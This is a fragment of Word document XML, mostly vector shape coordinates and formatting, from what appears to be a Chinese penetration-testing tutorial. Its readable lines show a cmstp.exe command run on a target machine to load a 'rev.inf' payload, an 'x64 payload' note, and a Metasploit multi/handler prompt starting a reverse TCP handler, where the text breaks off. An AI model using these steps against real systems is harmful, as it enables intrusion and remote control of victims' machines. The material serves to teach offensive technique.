,3536,8026,3536,8027,3536,8028,3536,8029,3536,8031,3536,8032,3536,8033,3536,8035,3536,8036,3536,8038,3536,8039,3536,8041,3536,8042,3536,8044,3536,8046,3536,8048,3536,8050,3536,8052,3536,8054,3536,8056,3536,8058,3536,8060,3536,8062,3536,8065,3536,8067,3536,8069,3536,8072,3536,8074,3536,8077,3536,8080,3536,8083,3536,8086,3536,8088,3536,8092,3536,8095,3536,8098,3536,8101,3536,8104,3536,8108,3536,8111,3536,8115,3536,8118,3536,8122,3536,8126,3536,8130,3536,8134,3536,8138,3536,8142,3536,8146,3536,8151,3536,8155,3536,8159,3536,8164,3536,8169,3536,8173,3536,8178,3536,8183,3536,8188,3536,8194,3536,8199,3536,8204,3536,8210,3536,8215,3536,8221,3536,8226,3536,8232,3536,8238,3536,8244,3536,8251,3536,8257,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3536,8263,3535,8263,3535,8263,3535,8263,3535,8263,3535,8263,3535,8263,3535,8263,3535,8263,3535,8263,3535,8263,3535,8263,3534,8263,3534,8263,3534,8263,3534,8263,3534,8263,3533,8263,3533,8263,3533,8263,3533,8263,3532,8263,3532,8263,3532,8263,3532,8263,3531,8263,3531,8263,3531,8263,3530,8263,3530,8263,3529,8263,3529,8263,3528,8263,3528,8263,3527,8263,3527,8263,3526,8263,3526,8263,3525,8263,3525,8263,3524,8263,3523,8263,3523,8263,3522,8263,3521,8263,3520,8263,3520,8263,3519,8263,3518,8263,3517,8263,3516,8263,3515,8263,3514,8263,3513,8263,3512,8263,3511,8263,3510,8263,3509,8263,3508,8263,3507,8263,3506,8263,3505,8263,3503,8263,3502,8263,3501,8263,3499,8263,3498,8263,3496,8263,3495,8263,3494,8263,3492,8263,3490,8263,3489,8263,3487,8263,3486,8263,3484,8263,3482,8263,3480,8263,3478,8263,3477,8263,3475,8263,3473,8263,3471,8263,3469,8263,3467,8263,3465,8263,3462,8263,3460,8263,3458,8263,3456,8263,3453,8263,3451,8263,3449,8263,3446,8263,3444,8263,3441,8263,3438,8263,3436,8263,3433,8263,3430,8263,3427,8263,3425,8263,3422,8263,3419,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8263,3416,8262,3416,8262,3416,8262,3416,8262,3416,8262,3416,8262,3416,8261,3416,8261,3416,8261,3416,8261,3416,8260,3416,8260,3416,8259,3416,8259,3416,8259,3416,8258,3416,8258,3416,8257,3416,8257,3416,8256,3416,8255,3416,8255,3416,8254,3416,8253,3416,8253,3416,8252,3416,8251,3416,8250,3416,8249,3416,8248,3416,8247,3416,8246,3416,8245,3416,8244,3416,8243,3416,8242,3416,8241,3416,8239,3416,8238,3416,8237,3416,8235,3416,8234,3416,8232,3416,8230,3416,8229,3416,8227,3416,8225,3416,8223,3416,8222,3416,8220,3416,8218,3416,8216,3416,8213,3416,8211,3416,8209,3416,8207,3416,8204,3416,8202,3416,8199,3416,8197,3416,8194,3416,8191,3416,8189,3416,8186,3416,8183,3416,8180,3416,8177,3416,8173,3416,8170,3416,8167,3416,8163,3416,8160,3416,8156,3416,8153,3416,8149,3416,8145,3416,8141,3416,8137,3416,8133,3416,8129,3416,8125,3416,8121,3416,8116,3416,8112,3416,8107,3416,8102,3416,8098,3416,8093,3416,8088,3416,8083,3416,8078,3416,8072,3416,8067,3416,8062,3416,8056,3416,8050,3416,8045,3416,8039,3416,8033,3416,8027,3416,8021,3416,8014,3416,8008e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:174.500pt;margin-top:436.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3490,8730" coordsize="130,250">
        <v:shape style="position:absolute;left:3490;top:8730;width:130;height:250" coordorigin="3490,8730" coordsize="130,250" path="m3506,8743l3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3506,8743,3507,8743,3507,8743,3507,8743,3507,8743,3507,8743,3507,8743,3507,8743,3508,8743,3508,8743,3508,8743,3508,8743,3508,8743,3509,8743,3509,8743,3509,8743,3509,8743,3510,8743,3510,8743,3510,8743,3511,8743,3511,8743,3511,8743,3512,8743,3512,8743,3513,8743,3513,8743,3514,8743,3514,8743,3515,8743,3515,8743,3516,8743,3516,8743,3517,8743,3518,8743,3518,8743,3519,8743,3520,8743,3520,8743,3521,8743,3522,8743,3523,8743,3524,8743,3524,8743,3525,8743,3526,8743,3527,8743,3528,8743,3529,8743,3530,8743,3531,8743,3532,8743,3533,8743,3535,8743,3536,8743,3537,8743,3538,8743,3540,8743,3541,8743,3542,8743,3544,8743,3545,8743,3547,8743,3548,8743,3550,8743,3551,8743,3553,8743,3554,8743,3556,8743,3558,8743,3559,8743,3561,8743,3563,8743,3565,8743,3567,8743,3569,8743,3571,8743,3573,8743,3575,8743,3577,8743,3579,8743,3581,8743,3584,8743,3586,8743,3588,8743,3591,8743,3593,8743,3596,8743,3598,8743,3601,8743,3603,8743,3606,8743,3609,8743,3611,8743,3614,8743,3617,8743,3620,8743,3623,8743,3626,8743,3626,8743,3626,8743,3626,8743,3626,8743,3626,8743,3626,8743,3626,8743,3626,8743,3626,8743,3626,8744,3626,8744,3626,8744,3626,8744,3626,8744,3626,8744,3626,8744,3626,8744,3626,8744,3626,8744,3626,8744,3626,8745,3626,8745,3626,8745,3626,8745,3626,8745,3626,8746,3626,8746,3626,8746,3626,8747,3626,8747,3626,8747,3626,8748,3626,8748,3626,8749,3626,8749,3626,8750,3626,8750,3626,8751,3626,8752,3626,8752,3626,8753,3626,8754,3626,8755,3626,8755,3626,8756,3626,8757,3626,8758,3626,8759,3626,8760,3626,8761,3626,8762,3626,8763,3626,8765,3626,8766,3626,8767,3626,8769,3626,8770,3626,8771,3626,8773,3626,8774,3626,8776,3626,8778,3626,8779,3626,8781,3626,8783,3626,8785,3626,8787,3626,8789,3626,8791,3626,8793,3626,8795,3626,8798,3626,8800,3626,8802,3626,8805,3626,8807,3626,8810,3626,8813,3626,8815,3626,8818,3626,8821,3626,8824,3626,8827,3626,8830,3626,8833,3626,8836,3626,8840,3626,8843,3626,8847,3626,8850,3626,8854,3626,8857,3626,8861,3626,8865,3626,8869,3626,8873,3626,8877,3626,8882,3626,8886,3626,8890,3626,8895,3626,8899,3626,8904,3626,8909,3626,8914,3626,8919,3626,8924,3626,8929,3626,8934,3626,8939,3626,8945,3626,8950,3626,8956,3626,8962,3626,8968,3626,8974,3626,8980,3626,8986,3626,8992,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3626,8999,3625,8999,3625,8999,3625,8999,3625,8999,3625,8999,3625,8999,3625,8999,3625,8999,3625,8999,3625,8999,3624,8999,3624,8999,3624,8999,3624,8999,3624,8999,3623,8999,3623,8999,3623,8999,3623,8999,3623,8999,3622,8999,3622,8999,3622,8999,3621,8999,3621,8999,3621,8999,3620,8999,3620,8999,3619,8999,3619,8999,3618,8999,3618,8999,3617,8999,3617,8999,3616,8999,3616,8999,3615,8999,3615,8999,3614,8999,3613,8999,3613,8999,3612,8999,3611,8999,3610,8999,3610,8999,3609,8999,3608,8999,3607,8999,3606,8999,3605,8999,3604,8999,3603,8999,3602,8999,3601,8999,3600,8999,3599,8999,3598,8999,3597,8999,3596,8999,3595,8999,3593,8999,3592,8999,3591,8999,3589,8999,3588,8999,3587,8999,3585,8999,3584,8999,3582,8999,3581,8999,3579,8999,3577,8999,3576,8999,3574,8999,3572,8999,3570,8999,3569,8999,3567,8999,3565,8999,3563,8999,3561,8999,3559,8999,3557,8999,3555,8999,3552,8999,3550,8999,3548,8999,3546,8999,3543,8999,3541,8999,3539,8999,3536,8999,3534,8999,3531,8999,3528,8999,3526,8999,3523,8999,3520,8999,3517,8999,3515,8999,3512,8999,3509,8999,3506,8999,3506,8999,3506,8999,3506,8999,3506,8999,3506,8999,3506,8999,3506,8998,3506,8998,3506,8998,3506,8998,3506,8998,3506,8998,3506,8998,3506,8998,3506,8998,3506,8998,3506,8998,3506,8998,3506,8998,3506,8997,3506,8997,3506,8997,3506,8997,3506,8997,3506,8996,3506,8996,3506,8996,3506,8996,3506,8995,3506,8995,3506,8994,3506,8994,3506,8994,3506,8993,3506,8993,3506,8992,3506,8991,3506,8991,3506,8990,3506,8990,3506,8989,3506,8988,3506,8987,3506,8986,3506,8986,3506,8985,3506,8984,3506,8983,3506,8982,3506,8981,3506,8980,3506,8978,3506,8977,3506,8976,3506,8975,3506,8973,3506,8972,3506,8970,3506,8969,3506,8967,3506,8966,3506,8964,3506,8962,3506,8961,3506,8959,3506,8957,3506,8955,3506,8953,3506,8951,3506,8949,3506,8947,3506,8944,3506,8942,3506,8940,3506,8937,3506,8935,3506,8932,3506,8929,3506,8927,3506,8924,3506,8921,3506,8918,3506,8915,3506,8912,3506,8909,3506,8906,3506,8902,3506,8899,3506,8895,3506,8892,3506,8888,3506,8884,3506,8881,3506,8877,3506,8873,3506,8869,3506,8865,3506,8860,3506,8856,3506,8852,3506,8847,3506,8843,3506,8838,3506,8833,3506,8828,3506,8823,3506,8818,3506,8813,3506,8808,3506,8802,3506,8797,3506,8791,3506,8786,3506,8780,3506,8774,3506,8768,3506,8762,3506,8756,3506,8750,3506,8743e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:490.800pt;width:467.400pt;height:116.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>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44" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmstp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ni</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\Users\John\Desktop\rev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>inf</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20" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5511" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Started</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
